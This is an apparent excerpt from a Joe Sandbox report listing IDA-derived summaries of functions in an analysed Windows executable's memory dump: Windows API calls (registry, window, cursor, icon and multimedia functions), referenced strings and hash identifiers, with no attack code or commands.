                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6ac1046f177f772569c710c3aebc92a0c758ddaf2b84f10793c533f2ad43547c
                                                                                                                                                                                                                                                                            • Instruction ID: 20134c8131e663a76bd3fd25aafd0c8006064e4d22eea0754c5c0d9645c2d757
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ac1046f177f772569c710c3aebc92a0c758ddaf2b84f10793c533f2ad43547c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A7159B6D00209ABDF20DFA5DC48FAEBBB8FF04361F194125FD25A6190D7319A49CB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7CF1D
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8DCD0,00000000,?,00000000,?,?), ref: 00C7CFA4
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C7D004
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D054
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D0CF
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C7D112
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C7D221
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C7D2AD
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7D2E1
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7D2EE
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C7D3C0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                            • Opcode ID: d33f8307b4dcf35e80d571371df85222e580899fe85537744783a5c4f4037468
                                                                                                                                                                                                                                                                            • Instruction ID: fd46919342592fa2b2db9cb37bd4cee8ed035ec30082774ba0df8d28257f0548
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d33f8307b4dcf35e80d571371df85222e580899fe85537744783a5c4f4037468
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A1237356042059FDB14EF14C881B2AB7F5EF89714F14889DF99A9B3A2CB31ED46CB81
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C81462
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8149D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C814F0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C81526
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C815A2
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8161D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C53535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C53547
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                            • Opcode ID: c68fdea4362489eb04e401625a38dcf39393b5d5dd9aacd805c1cd3f1ced1bd0
                                                                                                                                                                                                                                                                            • Instruction ID: 4ecb2ded3bbe44551e77adcf53f045a68c57825461891f5cdbd5a9b347def8d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c68fdea4362489eb04e401625a38dcf39393b5d5dd9aacd805c1cd3f1ced1bd0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAE1A2756043018FCB14EF25C45186AB7E6FF94318F18495DF8A69B3A2DB30EE4ACB85
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                            • Opcode ID: f742fb0f2d45718e1fcb0513c7ea080b8319544e536d926ac5771c7d92d25b0a
                                                                                                                                                                                                                                                                            • Instruction ID: f94bfbd7e796a3a205b1b389292524cffa120379b593e0193df9fc1232dd821c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f742fb0f2d45718e1fcb0513c7ea080b8319544e536d926ac5771c7d92d25b0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7071F9B260012A8BCF109E7CC9515FB33B5AF60768F258524F87FA7294EA35DE85D390
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DB5
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DC9
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DEC
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88E0F
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C88E4D
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C86691), ref: 00C88EA9
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88EE2
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C88F25
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88F5C
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C88F68
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C88F78
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00C86691), ref: 00C88F87
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C88FA4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C88FB0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                            • Opcode ID: 36ec1a5dc23352ac29a14b1fb9fe725f0d832fc3c5a106c3786b64e6abcf206e
                                                                                                                                                                                                                                                                            • Instruction ID: 60745e876c4f701ac46c2c88087b840d0e1bc0216cd7ed15a3f3059a0bd252ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36ec1a5dc23352ac29a14b1fb9fe725f0d832fc3c5a106c3786b64e6abcf206e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE612371900219BEEB14EFA4CC41BFE77A8BF09B14F504106FA25D60D0DB74AA88DBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C6493D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64948
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C6499F
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C649DD
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00C64A1B
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64A63
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64A9E
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64ACC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                            • Opcode ID: 61c599691b8d8067b8b8de6db01ed1d301dddc2fd4b2b5bae96dab74de971f2d
                                                                                                                                                                                                                                                                            • Instruction ID: c91f5238a2e7c7c78d1f20d144801c940e7dbcd12d28ce446ffb6ddf9c30f517
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61c599691b8d8067b8b8de6db01ed1d301dddc2fd4b2b5bae96dab74de971f2d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0171E3725082059FC724EF24C88097FB7E8EF94758F00496DF8A697262EB31DE49CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C56395
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C563A7
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C563BE
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C563D3
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C563D9
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C563E9
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C563EF
                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C56410
                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C5642A
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C56433
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5649A
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C564D6
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C564DC
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C564E3
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C5653A
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C56547
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C5656C
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C56596
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                            • Opcode ID: b96f5eea6fa42dee57d482106851ef67b8a6f65e387e63faf30e4ed5aa1082b5
                                                                                                                                                                                                                                                                            • Instruction ID: d0dd2edcc53bdb228364b62aa860b300b3ef1dc989a789caddfa477b16bad144
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b96f5eea6fa42dee57d482106851ef67b8a6f65e387e63faf30e4ed5aa1082b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1071B235900709AFDB20DFA8CE45BAEBBF5FF08705F500918E596A35A0D771EA84CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00C70884
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00C7088F
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C7089A
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00C708A5
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00C708B0
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00C708BB
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00C708C6
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00C708D1
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00C708DC
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00C708E7
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00C708F2
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00C708FD
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00C70908
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00C70913
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00C7091E
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00C70929
                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00C70939
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7097B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                            • Opcode ID: cb46c69401af0be4ece8e5b70d9a9fbf178f9d64420a75b9bbd4a7db2f09eec3
                                                                                                                                                                                                                                                                            • Instruction ID: 8d144e098b70020dc20c81f69af082f8d6bf8b1950f4ecd12ce4371554f10925
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb46c69401af0be4ece8e5b70d9a9fbf178f9d64420a75b9bbd4a7db2f09eec3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC4165B0D08319AADB10DFBA8C85C6EBFE8FF44754B50852AE11DE7291DA78D901CF91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C10436
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00CC170C,00000FA0,C97470E6,?,?,?,?,00C32733,000000FF), ref: 00C1048C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C32733,000000FF), ref: 00C10497
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C32733,000000FF), ref: 00C104A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C104BE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C104CC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C104DA
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10505
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10510
                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00C10457
                                                                                                                                                                                                                                                                              • Part of subcall function 00C10413: __onexit.LIBCMT ref: 00C10419
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 00C104C4
                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C10492
                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 00C104B8
                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 00C104D2
                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 00C104A3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                            • Opcode ID: e755646c2243cbddb2c49fd37a4315e2367005b68cb1b8e7087c1d02a47edfe8
                                                                                                                                                                                                                                                                            • Instruction ID: 35dd5c52640e5962fbde9831c806885d63ab049f69a9894187977438eddb33af
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e755646c2243cbddb2c49fd37a4315e2367005b68cb1b8e7087c1d02a47edfe8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F621C233A44704AFD7106BA4AC4AFED3795EF07B61F240139F902922D1DEB098C0AB98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
